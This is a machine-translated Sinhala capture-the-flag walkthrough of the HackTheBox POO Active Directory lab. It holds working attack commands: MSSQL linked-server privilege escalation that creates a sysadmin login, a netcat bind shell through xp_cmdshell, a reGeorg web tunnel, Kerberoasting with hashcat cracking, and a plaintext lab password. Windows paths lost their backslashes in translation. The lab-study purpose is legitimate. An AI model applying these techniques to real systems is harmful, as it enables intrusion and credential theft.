HackTheBoxendgame. රසායනාගාරයේ වෘත්තීය ප්‍රහාරාත්මක මෙහෙයුම් සම්මත කිරීම. Pentest Active නාමාවලිය

HackTheBoxendgame. රසායනාගාරයේ වෘත්තීය ප්‍රහාරාත්මක මෙහෙයුම් සම්මත කිරීම. Pentest Active නාමාවලිය

මෙම ලිපියෙන් අපි යන්ත්‍රයක් පමණක් නොව සමස්ත කුඩා රසායනාගාරයක් වෙබ් අඩවියෙන් ගමන් කිරීම විශ්ලේෂණය කරමු. HackTheBox.

විස්තරයේ දක්වා ඇති පරිදි, POO නිර්මාණය කර ඇත්තේ කුඩා සක්‍රීය නාමාවලි පරිසරයක ප්‍රහාරවල සෑම අදියරකදීම කුසලතා පරීක්ෂා කිරීමට ය. ඉලක්කය වන්නේ ප්‍රවේශ විය හැකි සත්කාරකයකු සම්මුතියක් ඇති කර ගැනීම, වරප්‍රසාද තීව්‍ර කිරීම සහ අවසානයේ ක්‍රියාවලියේදී කොඩි 5ක් එකතු කිරීමෙන් සම්පූර්ණ වසම සම්මුතියකට පත් කිරීමයි.

රසායනාගාරයට සම්බන්ධ වීම VPN හරහා වේ. ඔබ තොරතුරු ආරක්ෂණ ක්ෂේත්‍රයේ යමක් දන්නා පුද්ගලයින් සමඟ පුද්ගලික ජාලයක අවසන් වන බැවින්, වැඩ කරන පරිගණකයකින් හෝ ඔබට වැදගත් දත්ත ඇති සත්කාරක සමාගමකින් සම්බන්ධ නොවීම නිර්දේශ කෙරේ :)

ආයතනික තොරතුරු
නව ලිපි, මෘදුකාංග සහ වෙනත් තොරතුරු ගැන ඔබට දැනගත හැකි වන පරිදි, මම නිර්මාණය කළෙමි ටෙලිග්‍රාම් නාලිකාව и ඕනෑම ගැටළුවක් සාකච්ඡා කිරීමට කණ්ඩායමක් IIKB ප්රදේශයේ. එසේම ඔබගේ පුද්ගලික ඉල්ලීම්, ප්‍රශ්න, යෝජනා සහ නිර්දේශ මම බලලා හැමෝටම උත්තර දෙන්නම්..

සියලුම තොරතුරු සපයනු ලබන්නේ අධ්‍යාපනික අරමුණු සඳහා පමණි. මෙම ලේඛනයේ කතුවරයා මෙම ලේඛනය අධ්‍යයනය කිරීමෙන් ලබාගත් දැනුම සහ ක්‍රම භාවිතා කිරීම හේතුවෙන් කිසිවෙකුට සිදුවන හානිය සම්බන්ධයෙන් කිසිදු වගකීමක් භාර නොගනී.

හැදින්වීමේ

මෙම අවසන් ක්‍රීඩාව යන්ත්‍ර දෙකකින් සමන්විත වන අතර කොඩි 5ක් අඩංගු වේ.

HackTheBoxendgame. රසායනාගාරයේ වෘත්තීය ප්‍රහාරාත්මක මෙහෙයුම් සම්මත කිරීම. Pentest Active නාමාවලිය

පවතින සත්කාරකයේ විස්තරයක් සහ ලිපිනයක් ද ලබා දී ඇත.

HackTheBoxendgame. රසායනාගාරයේ වෘත්තීය ප්‍රහාරාත්මක මෙහෙයුම් සම්මත කිරීම. Pentest Active නාමාවලිය

ආරම්භ කරමු!

Recon කොඩිය

මෙම යන්ත්‍රයට 10.13.38.11 IP ලිපිනයක් ඇත, මම එය /etc/hosts වෙත එකතු කරමි.
10.13.38.11 poo.htb

පළමු පියවර වන්නේ විවෘත වරායන් පරිලෝකනය කිරීමයි. සියලුම ports nmap මගින් ස්කෑන් කිරීමට බොහෝ කාලයක් ගතවන නිසා, මම මුලින්ම එය masscan වලින් කරන්නම්. අපි tun0 අතුරුමුහුණතෙන් සියලුම TCP සහ UDP ports 500pps හි පරිලෝකනය කරමු.

sudo masscan -e tun0 -p1-65535,U:1-65535 10.13.38.11 --rate=500

HackTheBoxendgame. රසායනාගාරයේ වෘත්තීය ප්‍රහාරාත්මක මෙහෙයුම් සම්මත කිරීම. Pentest Active නාමාවලිය

දැන්, වරායන්හි ක්‍රියාත්මක වන සේවාවන් පිළිබඳ වඩාත් සවිස්තරාත්මක තොරතුරු ලබා ගැනීම සඳහා, අපි -A විකල්පය සමඟ ස්කෑන් එකක් ධාවනය කරමු.

nmap -A poo.htb -p80,1433

HackTheBoxendgame. රසායනාගාරයේ වෘත්තීය ප්‍රහාරාත්මක මෙහෙයුම් සම්මත කිරීම. Pentest Active නාමාවලිය

මේ අනුව, අපට IIS සහ MSSQL සේවා ඇත. මෙම අවස්ථාවේදී, අපි වසම සහ පරිගණකයේ සැබෑ DNS නම සොයා ගනිමු. වෙබ් සේවාදායකයේ, අපි IIS මුල් පිටුව විසින් පිළිගනු ලැබේ.

HackTheBoxendgame. රසායනාගාරයේ වෘත්තීය ප්‍රහාරාත්මක මෙහෙයුම් සම්මත කිරීම. Pentest Active නාමාවලිය

අපි නාමාවලි හරහා යමු. මම මේ සඳහා gobuster භාවිතා කරමි. පරාමිතිවල අපි නූල් 128 (-t), URL (-u), ශබ්දකෝෂය (-w) සහ අපට උනන්දුවක් දක්වන දිගු ගණන (-x) දක්වයි.

gobuster dir -t 128 -u poo.htb -w /usr/share/seclists/Discovery/Web-Content/raft-large-words.txt -x php,aspx,html

HackTheBoxendgame. රසායනාගාරයේ වෘත්තීය ප්‍රහාරාත්මක මෙහෙයුම් සම්මත කිරීම. Pentest Active නාමාවලිය

මෙය අපට /පරිපාලක නාමාවලිය සඳහා HTTP සත්‍යාපනය මෙන්ම ප්‍රවේශ විය හැකි ඩෙස්ක්ටොප් සේවාවක් .DS_Store ගොනුවක් ලබා දෙයි. .DS_Store යනු ගොනු ලැයිස්තුවක්, නිරූපක ස්ථාන සහ තෝරාගත් පසුබිම් රූපය වැනි ෆෝල්ඩරයක් සඳහා අභිරුචි සැකසුම් ගබඩා කරන ගොනු වේ. එවැනි ගොනුවක් වෙබ් සංවර්ධකයින්ගේ වෙබ් සේවාදායක නාමාවලියෙහි අවසන් විය හැක. මේ ආකාරයෙන් අපි නාමාවලියේ අන්තර්ගතය පිළිබඳ තොරතුරු ලබා ගනිමු. මේ සඳහා ඔබට භාවිතා කළ හැකිය DS_Store crawler.

python3 dsstore_crawler.py -i http://poo.htb/

HackTheBoxendgame. රසායනාගාරයේ වෘත්තීය ප්‍රහාරාත්මක මෙහෙයුම් සම්මත කිරීම. Pentest Active නාමාවලිය

අපි නාමාවලියේ අන්තර්ගතය ලබා ගනිමු. මෙහි ඇති වඩාත්ම සිත්ගන්නා කරුණ නම් / dev නාමාවලියයි, එයින් අපට මූලාශ්‍ර සහ db ගොනු ශාඛා දෙකකින් බැලිය හැකිය. නමුත් සේවාව IIS ShortName වලට ගොදුරු විය හැකි නම් අපට ගොනු සහ නාමාවලි නාමවල පළමු අක්ෂර 6 භාවිතා කළ හැක. භාවිතයෙන් ඔබට මෙම අවදානම පරීක්ෂා කළ හැකිය IIS කෙටි නම ස්කෑනර්.

HackTheBoxendgame. රසායනාගාරයේ වෘත්තීය ප්‍රහාරාත්මක මෙහෙයුම් සම්මත කිරීම. Pentest Active නාමාවලිය

තවද "poo_co" වලින් ආරම්භ වන එක් පෙළ ගොනුවක් අපට හමු වේ. ඊළඟට කුමක් කළ යුතු දැයි නොදැන, මම නාමාවලි ශබ්දකෝෂයෙන් "co" වලින් ආරම්භ වන සියලුම වචන සරලව තෝරා ගත්තෙමි.

cat /usr/share/seclists/Discovery/Web-Content/raft-large-words.txt | grep -i "^co" > co_words.txt

සහ wfuzz සමඟ නැවත නැවත කියන්න.

wfuzz -w ./co_words.txt -u "http://poo.htb/dev/dca66d38fd916317687e1390a420c3fc/db/poo_FUZZ.txt" --hc 404

HackTheBoxendgame. රසායනාගාරයේ වෘත්තීය ප්‍රහාරාත්මක මෙහෙයුම් සම්මත කිරීම. Pentest Active නාමාවලිය

අපි නිවැරදි වචනය සොයා ගනිමු! අපි මෙම ගොනුව දෙස බලා, අක්තපත්ර සුරකින්න (DBNAME පරාමිතිය අනුව විනිශ්චය කිරීම, ඒවා MSSQL වෙතින් වේ).

HackTheBoxendgame. රසායනාගාරයේ වෘත්තීය ප්‍රහාරාත්මක මෙහෙයුම් සම්මත කිරීම. Pentest Active නාමාවලිය

අපි ධජය භාර දී අපි 20% ඉදිරියට යනවා.

HackTheBoxendgame. රසායනාගාරයේ වෘත්තීය ප්‍රහාරාත්මක මෙහෙයුම් සම්මත කිරීම. Pentest Active නාමාවලිය

හහ් කොඩිය

අපි MSSQL වෙත සම්බන්ධ කරමු, මම DBeaver භාවිතා කරමි.

HackTheBoxendgame. රසායනාගාරයේ වෘත්තීය ප්‍රහාරාත්මක මෙහෙයුම් සම්මත කිරීම. Pentest Active නාමාවලිය

මෙම දත්ත ගබඩාවේ රසවත් කිසිවක් අපට හමු නොවේ, අපි SQL සංස්කාරකයක් සාදා පරිශීලකයින් යනු කුමක්දැයි පරීක්ෂා කරමු.

SELECT name FROM master..syslogins;

HackTheBoxendgame. රසායනාගාරයේ වෘත්තීය ප්‍රහාරාත්මක මෙහෙයුම් සම්මත කිරීම. Pentest Active නාමාවලිය

අපට පරිශීලකයින් දෙදෙනෙක් සිටී. අපි අපේ වරප්රසාද පරීක්ෂා කරමු.

SELECT is_srvrolemember('sysadmin'), is_srvrolemember('dbcreator'), is_srvrolemember('bulkadmin'), is_srvrolemember('diskadmin'), is_srvrolemember('processadmin'), is_srvrolemember('serveradmin'), is_srvrolemember('setupadmin'), is_srvrolemember('securityadmin');

HackTheBoxendgame. රසායනාගාරයේ වෘත්තීය ප්‍රහාරාත්මක මෙහෙයුම් සම්මත කිරීම. Pentest Active නාමාවලිය

මේ අනුව, වරප්රසාද නොමැත. සම්බන්ධිත සේවාදායකයන් බලමු, මම මෙම තාක්ෂණය ගැන විස්තරාත්මකව ලියා ඇත මෙහි.

SELECT * FROM master..sysservers;

HackTheBoxendgame. රසායනාගාරයේ වෘත්තීය ප්‍රහාරාත්මක මෙහෙයුම් සම්මත කිරීම. Pentest Active නාමාවලිය

මෙහෙමයි අපි තවත් SQL Server එකක් හොයාගන්නේ. openquery() භාවිතයෙන් මෙම සේවාදායකයේ විධාන ක්‍රියාත්මක කිරීම පරීක්ෂා කරමු.

SELECT version FROM openquery("COMPATIBILITYPOO_CONFIG", 'select @@version as version');

HackTheBoxendgame. රසායනාගාරයේ වෘත්තීය ප්‍රහාරාත්මක මෙහෙයුම් සම්මත කිරීම. Pentest Active නාමාවලිය

තවද අපට විමසුම් ගසක් පවා ගොඩනගා ගත හැකිය.

SELECT version FROM openquery("COMPATIBILITYPOO_CONFIG", 'SELECT version FROM openquery("COMPATIBILITYPOO_PUBLIC", ''select @@version as version'');');

කාරණය නම් අපි සම්බන්ධිත සේවාදායකයකට ඉල්ලීමක් කරන විට, ඉල්ලීම වෙනත් පරිශීලකයෙකුගේ සන්දර්භය තුළ ක්‍රියාත්මක වේ! සම්බන්ධිත සේවාදායකයේ අප ධාවනය කරන්නේ කුමන පරිශීලක සන්දර්භයදැයි බලමු.

SELECT name FROM openquery("COMPATIBILITYPOO_CONFIG", 'SELECT user_name() as name');

HackTheBoxendgame. රසායනාගාරයේ වෘත්තීය ප්‍රහාරාත්මක මෙහෙයුම් සම්මත කිරීම. Pentest Active නාමාවලිය

දැන් අපි බලමු සම්බන්ධිත සේවාදායකයෙන් අපගේ ඉල්ලීම ක්‍රියාත්මක කරන්නේ කුමන සන්දර්භය තුළද යන්න!

SELECT * FROM openquery("COMPATIBILITYPOO_CONFIG", 'SELECT name FROM openquery("COMPATIBILITYPOO_PUBLIC", ''SELECT user_name() as name'');');

HackTheBoxendgame. රසායනාගාරයේ වෘත්තීය ප්‍රහාරාත්මක මෙහෙයුම් සම්මත කිරීම. Pentest Active නාමාවලිය

මේ අනුව, එය සියලු වරප්‍රසාද තිබිය යුතු DBO සන්දර්භයකි. සම්බන්ධිත සේවාදායකයකින් ඉල්ලීමක් ඇත්නම් වරප්‍රසාද පරීක්ෂා කරමු.

SELECT * FROM openquery("COMPATIBILITYPOO_CONFIG", 'SELECT * FROM openquery("COMPATIBILITYPOO_PUBLIC", ''SELECT is_srvrolemember(''''sysadmin''''), is_srvrolemember(''''dbcreator''''), is_srvrolemember(''''bulkadmin''''), is_srvrolemember(''''diskadmin''''), is_srvrolemember(''''processadmin''''), is_srvrolemember(''''serveradmin''''), is_srvrolemember(''''setupadmin''''), is_srvrolemember(''''securityadmin'''')'')');

HackTheBoxendgame. රසායනාගාරයේ වෘත්තීය ප්‍රහාරාත්මක මෙහෙයුම් සම්මත කිරීම. Pentest Active නාමාවලිය

ඔබට පෙනෙන පරිදි, අපට සියලු වරප්රසාද තිබේ! අපි මේ විදියට අපේ ඇඩ්මින් හදමු. හැබැයි openquery හරහා යන්න දෙන්නෙ නෑ, EXECUTE AT හරහා කරමු.

EXECUTE('EXECUTE(''CREATE LOGIN [ralf] WITH PASSWORD=N''''ralfralf'''', DEFAULT_DATABASE=[master], CHECK_EXPIRATION=OFF, CHECK_POLICY=OFF'') AT "COMPATIBILITYPOO_PUBLIC"') AT "COMPATIBILITYPOO_CONFIG";
EXECUTE('EXECUTE(''CREATE USER [ralf] FOR LOGIN [ralf]'') AT "COMPATIBILITYPOO_PUBLIC"') AT "COMPATIBILITYPOO_CONFIG";
EXECUTE('EXECUTE(''ALTER SERVER ROLE [sysadmin] ADD MEMBER [ralf]'') AT "COMPATIBILITYPOO_PUBLIC"') AT "COMPATIBILITYPOO_CONFIG";
EXECUTE('EXECUTE(''ALTER ROLE [db_owner] ADD MEMBER [ralf]'') AT "COMPATIBILITYPOO_PUBLIC"') AT "COMPATIBILITYPOO_CONFIG";

දැන් අපි නව පරිශීලකයාගේ අක්තපත්‍ර සමඟ සම්බන්ධ වෙමු, අපි නව ධජ දත්ත ගබඩාව නිරීක්ෂණය කරමු.

HackTheBoxendgame. රසායනාගාරයේ වෘත්තීය ප්‍රහාරාත්මක මෙහෙයුම් සම්මත කිරීම. Pentest Active නාමාවලිය

අපි මේ ධජය භාර දී තවත් ඉදිරියට යනවා.

HackTheBoxendgame. රසායනාගාරයේ වෘත්තීය ප්‍රහාරාත්මක මෙහෙයුම් සම්මත කිරීම. Pentest Active නාමාවලිය

BackTrack කොඩිය

අපි MSSQL භාවිතයෙන් shell එක ලබා ගනිමු, මම mssqlclient භාවිතා කරන්නේ impacket පැකේජයෙන්.

mssqlclient.py ralf:[email protected] -db POO_PUBLIC

HackTheBoxendgame. රසායනාගාරයේ වෘත්තීය ප්‍රහාරාත්මක මෙහෙයුම් සම්මත කිරීම. Pentest Active නාමාවලිය

අපි මුරපද ලබා ගත යුතු අතර, අප දැනටමත් මුහුණ දී ඇති පළමු දෙය වෙබ් අඩවියකි. මේ අනුව, අපට වෙබ් සේවාදායක වින්‍යාසයක් අවශ්‍ය වේ (පහසු කවචයක් අත්හැරිය නොහැක, පෙනෙන විදිහට ෆයර්වෝලය ක්‍රියාත්මක වේ).

HackTheBoxendgame. රසායනාගාරයේ වෘත්තීය ප්‍රහාරාත්මක මෙහෙයුම් සම්මත කිරීම. Pentest Active නාමාවලිය

නමුත් ප්රවේශය ප්රතික්ෂේප කර ඇත. අපට MSSQL වෙතින් ගොනුව කියවිය හැකි වුවද, අපට අවශ්‍ය වන්නේ කුමන ක්‍රමලේඛන භාෂා වින්‍යාස කර ඇත්ද යන්නයි. MSSQL බහලුම තුළ අපි පයිතන් ඇති බව සොයා ගනිමු.

HackTheBoxendgame. රසායනාගාරයේ වෘත්තීය ප්‍රහාරාත්මක මෙහෙයුම් සම්මත කිරීම. Pentest Active නාමාවලිය

එවිට web.config ගොනුව කියවීමට ගැටලුවක් නොමැත.

EXEC sp_execute_external_script
@language = N'Python',
@script = "print(open('C:inetpubwwwrootweb.config').read())"

HackTheBoxendgame. රසායනාගාරයේ වෘත්තීය ප්‍රහාරාත්මක මෙහෙයුම් සම්මත කිරීම. Pentest Active නාමාවලිය

සොයාගත් අක්තපත්‍ර සමඟ, / පරිපාලක වෙත ගොස් කොඩිය ගන්න.

HackTheBoxendgame. රසායනාගාරයේ වෘත්තීය ප්‍රහාරාත්මක මෙහෙයුම් සම්මත කිරීම. Pentest Active නාමාවලිය

HackTheBoxendgame. රසායනාගාරයේ වෘත්තීය ප්‍රහාරාත්මක මෙහෙයුම් සම්මත කිරීම. Pentest Active නාමාවලිය

පාද ධජය

ඇත්ත වශයෙන්ම, ෆයර්වෝලයක් භාවිතා කිරීමෙන් යම් අපහසුතාවයක් ඇත, නමුත් ජාල සැකසුම් හරහා බැලීමේදී, IPv6 ප්රොටෝකෝලය ද භාවිතා කරන බව අපට පෙනේ!

HackTheBoxendgame. රසායනාගාරයේ වෘත්තීය ප්‍රහාරාත්මක මෙහෙයුම් සම්මත කිරීම. Pentest Active නාමාවලිය

අපි මෙම ලිපිනය /etc/hosts වෙත එකතු කරමු.
dead:babe::1001 poo6.htb
අපි නැවතත් ධාරකය පරිලෝකනය කරමු, නමුත් මෙවර IPv6 හරහා.

HackTheBoxendgame. රසායනාගාරයේ වෘත්තීය ප්‍රහාරාත්මක මෙහෙයුම් සම්මත කිරීම. Pentest Active නාමාවලිය

WinRM සේවාව IPv6 හරහා ලබා ගත හැක. සොයාගත් අක්තපත්‍ර සමඟ සම්බන්ධ වෙමු.

HackTheBoxendgame. රසායනාගාරයේ වෘත්තීය ප්‍රහාරාත්මක මෙහෙයුම් සම්මත කිරීම. Pentest Active නාමාවලිය

ඩෙස්ක්ටොප් එකේ ධජයක් ඇත, එය භාර දෙන්න.

HackTheBoxendgame. රසායනාගාරයේ වෘත්තීය ප්‍රහාරාත්මක මෙහෙයුම් සම්මත කිරීම. Pentest Active නාමාවලිය

P00ned කොඩිය

සමඟ සත්කාරක සමාගම පිළිබඳ ඔත්තු බැලීමෙන් පසුව winpeas අපට විශේෂ කිසිවක් සොයාගත නොහැක. ඉන්පසු නැවත අක්තපත්‍ර සෙවීමට තීරණය විය (මම මෙම මාතෘකාව ගැනද ලිව්වෙමි ලිපිය) නමුත් මට WinRM හරහා පද්ධතියෙන් සියලුම SPN ලබා ගැනීමට නොහැකි විය.

setspn.exe -T intranet.poo -Q */*

HackTheBoxendgame. රසායනාගාරයේ වෘත්තීය ප්‍රහාරාත්මක මෙහෙයුම් සම්මත කිරීම. Pentest Active නාමාවලිය

අපි MSSQL හරහා විධානය ක්‍රියාත්මක කරමු.

HackTheBoxendgame. රසායනාගාරයේ වෘත්තීය ප්‍රහාරාත්මක මෙහෙයුම් සම්මත කිරීම. Pentest Active නාමාවලිය

මේ ආකාරයට, අපි p00_hr සහ p00_adm පරිශීලකයින්ගේ SPN ලබා ගනිමු, එයින් අදහස් කරන්නේ ඔවුන් Kerberoasting වැනි ප්‍රහාරයකට ගොදුරු විය හැකි බවයි. කෙටියෙන් කිවහොත්, අපට ඔවුන්ගේ මුරපදයේ හැෂ් ලබා ගත හැකිය.

මුලින්ම ඔබ MSSQL පරිශීලකයා වෙනුවෙන් ස්ථාවර කවචයක් ලබා ගත යුතුය. නමුත් අපට ප්‍රවේශය සීමිත බැවින්, අපට සත්කාරක සමාගම සමඟ සම්බන්ධතාවක් ඇත්තේ වරාය 80 සහ 1433 හරහා පමණි. නමුත් 80 වරාය හරහා උමං මාර්ග තදබදයක් ඇති කළ හැකිය! මේ සඳහා අපි භාවිතා කරන්නෙමු පහත යෙදුම. අපි tunnel.aspx ගොනුව වෙබ් සේවාදායකයේ මුල් නාමාවලියට උඩුගත කරමු - C: inetpubwwwroot.

HackTheBoxendgame. රසායනාගාරයේ වෘත්තීය ප්‍රහාරාත්මක මෙහෙයුම් සම්මත කිරීම. Pentest Active නාමාවලිය

නමුත් අපි එයට පිවිසීමට උත්සාහ කරන විට අපට 404 දෝෂයක් ලැබේ.ඒ කියන්නේ *.aspx ගොනු ක්‍රියාත්මක නොවේ. මෙම දිගු සහිත ගොනු ක්‍රියාත්මක කිරීම සඳහා, පහත පරිදි ASP.NET 4.5 ස්ථාපනය කරන්න.

dism /online /enable-feature /all /featurename:IIS-ASPNET45

HackTheBoxendgame. රසායනාගාරයේ වෘත්තීය ප්‍රහාරාත්මක මෙහෙයුම් සම්මත කිරීම. Pentest Active නාමාවලිය

HackTheBoxendgame. රසායනාගාරයේ වෘත්තීය ප්‍රහාරාත්මක මෙහෙයුම් සම්මත කිරීම. Pentest Active නාමාවලිය

දැන්, tunnel.aspx වෙත පිවිසෙන විට, සියල්ල යාමට සූදානම් බවට අපට පිළිතුරක් ලැබේ.

HackTheBoxendgame. රසායනාගාරයේ වෘත්තීය ප්‍රහාරාත්මක මෙහෙයුම් සම්මත කිරීම. Pentest Active නාමාවලිය

ගමනාගමනය රිලේ කරන යෙදුමේ සේවාදායක කොටස දියත් කරමු. අපි 5432 වරායේ සිට සර්වරය වෙත සියලුම ගමනාගමනය යොමු කරන්නෙමු.

python ./reGeorgSocksProxy.py -p 5432 -u http://poo.htb/tunnel.aspx

HackTheBoxendgame. රසායනාගාරයේ වෘත්තීය ප්‍රහාරාත්මක මෙහෙයුම් සම්මත කිරීම. Pentest Active නාමාවලිය

තවද අපගේ ප්‍රොක්සි හරහා ඕනෑම යෙදුමක ගමනාගමනය යැවීමට අපි proxychains භාවිතා කරමු. අපි මෙම ප්‍රොක්සිය /etc/proxychains.conf වින්‍යාස ගොනුවට එකතු කරමු.

HackTheBoxendgame. රසායනාගාරයේ වෘත්තීය ප්‍රහාරාත්මක මෙහෙයුම් සම්මත කිරීම. Pentest Active නාමාවලිය

දැන් අපි වැඩසටහන සේවාදායකයට උඩුගත කරමු netcat, එය සමඟ අපි ස්ථාවර බන්ධන කවචයක් සහ තිර රචනය සාදන්නෙමු Kerberoast කැඳවන්න, එය සමඟ අපි Kerberoasting ප්‍රහාරය සිදු කරන්නෙමු.

HackTheBoxendgame. රසායනාගාරයේ වෘත්තීය ප්‍රහාරාත්මක මෙහෙයුම් සම්මත කිරීම. Pentest Active නාමාවලිය

දැන්, MSSQL හරහා, අපි සවන්දෙන්නා දියත් කරමු.

xp_cmdshell C:tempnc64.exe -e powershell.exe -lvp 4321

HackTheBoxendgame. රසායනාගාරයේ වෘත්තීය ප්‍රහාරාත්මක මෙහෙයුම් සම්මත කිරීම. Pentest Active නාමාවලිය

ඒ වගේම අපි අපේ proxy හරහා සම්බන්ධ වෙනවා.

proxychains rlwrap nc poo.htb 4321

HackTheBoxendgame. රසායනාගාරයේ වෘත්තීය ප්‍රහාරාත්මක මෙහෙයුම් සම්මත කිරීම. Pentest Active නාමාවලිය

සහ අපි හෑෂ් ලබා ගනිමු.

. .Invoke-Kerberoast.ps1
Invoke-Kerberoast -erroraction silentlycontinue -OutputFormat Hashcat | Select-Object Hash | Out-File -filepath 'C:tempkerb_hashes.txt' -Width 8000
type kerb_hashes.txt

HackTheBoxendgame. රසායනාගාරයේ වෘත්තීය ප්‍රහාරාත්මක මෙහෙයුම් සම්මත කිරීම. Pentest Active නාමාවලිය

ඊළඟට, ඔබ මෙම හෑෂ් මත පුනරාවර්තනය කළ යුතුය. ඔබ සතුව මුරපද දත්ත ශබ්ද කෝෂයක් නොතිබූ බැවින්, මම Seclists හි ලබා දී ඇති සියලුම මුරපද ශබ්දකෝෂ භාවිතා කළෙමි. ගණන් කිරීම සඳහා අපි හැෂ්කැට් භාවිතා කරමු.

hashcat -a 0 -m 13100 krb_hashes.txt /usr/share/seclists/Passwords/*.txt --force

තවද අපට මුරපද දෙකම හමු වේ, පළමුවැන්න ශබ්දකෝෂය dutch_passwordlist.txt, සහ දෙවැන්න Keyboard-Combinations.txt.

HackTheBoxendgame. රසායනාගාරයේ වෘත්තීය ප්‍රහාරාත්මක මෙහෙයුම් සම්මත කිරීම. Pentest Active නාමාවලිය

HackTheBoxendgame. රසායනාගාරයේ වෘත්තීය ප්‍රහාරාත්මක මෙහෙයුම් සම්මත කිරීම. Pentest Active නාමාවලිය

එබැවින් අපට පරිශීලකයින් තිදෙනෙක් සිටී, අපි වසම් පාලකය වෙත යමු. අපි මුලින්ම ඔහුගේ ලිපිනය සොයා බලමු.

HackTheBoxendgame. රසායනාගාරයේ වෘත්තීය ප්‍රහාරාත්මක මෙහෙයුම් සම්මත කිරීම. Pentest Active නාමාවලිය

නියමයි, අපි වසම් පාලකයේ IP ලිපිනය සොයා ගත්තෙමු. වසමේ සියලුම පරිශීලකයින් මෙන්ම ඔවුන්ගෙන් පරිපාලක කවුදැයි සොයා බලමු. තොරතුරු ලබා ගැනීමට ස්ක්‍රිප්ට් බාගත කිරීමට PowerView.ps1. එවිට අපි -s පරාමිතිය තුළ ස්ක්‍රිප්ට් සමඟ ඩිරෙක්ටරිය සඳහන් කරමින් නරක-winrm භාවිතයෙන් සම්බන්ධ කරන්නෙමු. ඊට පස්සේ අපි PowerView ස්ක්‍රිප්ට් එක පූරණය කරන්නම්.

HackTheBoxendgame. රසායනාගාරයේ වෘත්තීය ප්‍රහාරාත්මක මෙහෙයුම් සම්මත කිරීම. Pentest Active නාමාවලිය

දැන් අපට එහි සියලුම කාර්යයන් සඳහා ප්‍රවේශය ඇත. p00_adm පරිශීලක වරප්‍රසාද ලත් පරිශීලකයෙකු ලෙස පෙනේ, එබැවින් අපි එහි සන්දර්භය තුළ වැඩ කරන්නෙමු. මෙම පරිශීලකයා සඳහා PSCdential object එකක් නිර්මාණය කරමු.

$User = 'p00_adm'
$Password = 'ZQ!5t4r'
$Cpass = ConvertTo-SecureString -AsPlainText $Password -force
$Creds = New-Object System.Management.Automation.PSCredential -ArgumentList $User,$Cpass

දැන් අපි ක්‍රෙඩ්ස් සඳහන් කරන සියලුම Powershell විධාන p00_adm වෙනුවෙන් ක්‍රියාත්මක වේ. අපි පරිශීලකයින්ගේ ලැයිස්තුවක් සහ AdminCount ගුණාංගය පෙන්වමු.

Get-NetUser -DomainController dc -Credential $Creds | select name,admincount

HackTheBoxendgame. රසායනාගාරයේ වෘත්තීය ප්‍රහාරාත්මක මෙහෙයුම් සම්මත කිරීම. Pentest Active නාමාවලිය

එබැවින්, අපගේ පරිශීලකයා සැබවින්ම වරප්රසාද ලබා ඇත. ඔහු අයත් වන්නේ කුමන කණ්ඩායම් වලටද යන්න බලමු.

Get-NetGroup -UserName "p00_adm" -DomainController dc -Credential $Creds

HackTheBoxendgame. රසායනාගාරයේ වෘත්තීය ප්‍රහාරාත්මක මෙහෙයුම් සම්මත කිරීම. Pentest Active නාමාවලිය

පරිශීලකයා වසම් පරිපාලකයෙකු බව අපි අවසානයේ තහවුරු කරමු. මෙය වසම් පාලකය වෙත දුරස්ථව ලොග් වීමට අයිතිය ලබා දෙයි. අපි අපේ උමග භාවිතයෙන් WinRM සමඟ ලොග් වීමට උත්සාහ කරමු. නරක-winrm භාවිතා කරන විට reGeorg විසින් නිකුත් කරන ලද දෝෂ නිසා මම ව්‍යාකූල වීමි.

HackTheBoxendgame. රසායනාගාරයේ වෘත්තීය ප්‍රහාරාත්මක මෙහෙයුම් සම්මත කිරීම. Pentest Active නාමාවලිය

එවිට අපි තවත් පහසු එකක් භාවිතා කරමු. ස්ක්‍රිප්ට් WinRM වෙත සම්බන්ධ වීමට. සම්බන්ධතා පරාමිතීන් විවෘත කර වෙනස් කරන්න.

HackTheBoxendgame. රසායනාගාරයේ වෘත්තීය ප්‍රහාරාත්මක මෙහෙයුම් සම්මත කිරීම. Pentest Active නාමාවලිය

අපි සම්බන්ධ වීමට උත්සාහ කරමු, අපි පද්ධතියේ සිටිමු.

HackTheBoxendgame. රසායනාගාරයේ වෘත්තීය ප්‍රහාරාත්මක මෙහෙයුම් සම්මත කිරීම. Pentest Active නාමාවලිය

නමුත් කොඩියක් නැත. ඉන්පසු පරිශීලකයා දෙස බලා ඩෙස්ක්ටොප් පරීක්ෂා කරන්න.

HackTheBoxendgame. රසායනාගාරයේ වෘත්තීය ප්‍රහාරාත්මක මෙහෙයුම් සම්මත කිරීම. Pentest Active නාමාවලිය

mr3ks හි ධජය අපට හමු වූ අතර රසායනාගාරය 100% සම්පූර්ණ කර ඇත.

HackTheBoxendgame. රසායනාගාරයේ වෘත්තීය ප්‍රහාරාත්මක මෙහෙයුම් සම්මත කිරීම. Pentest Active නාමාවලිය

එච්චරයි. ප්‍රතිපෝෂණ ලෙස, ඔබ මෙම ලිපියෙන් අලුත් දෙයක් ඉගෙන ගත්තාද සහ එය ඔබට ප්‍රයෝජනවත්ද යන්න කමෙන්ට් කරන්න.

ඔබට අප හා සම්බන්ධ විය හැක විදුලි පණිවුඩ. එහිදී ඔබට රසවත් ද්රව්ය, කාන්දු වූ පාඨමාලා මෙන්ම මෘදුකාංග ද සොයාගත හැකිය. තොරතුරු තාක්ෂණ ක්ෂේත්‍රයේ බොහෝ ක්ෂේත්‍ර තේරුම් ගන්නා පුද්ගලයින් සිටින ප්‍රජාවක් එක්රැස් කරමු, එවිට අපට ඕනෑම IT සහ තොරතුරු ආරක්ෂණ ගැටළු සම්බන්ධයෙන් සෑම විටම එකිනෙකාට උදව් කළ හැකිය.

මූලාශ්රය: www.habr.com

අදහස් එක් කරන්න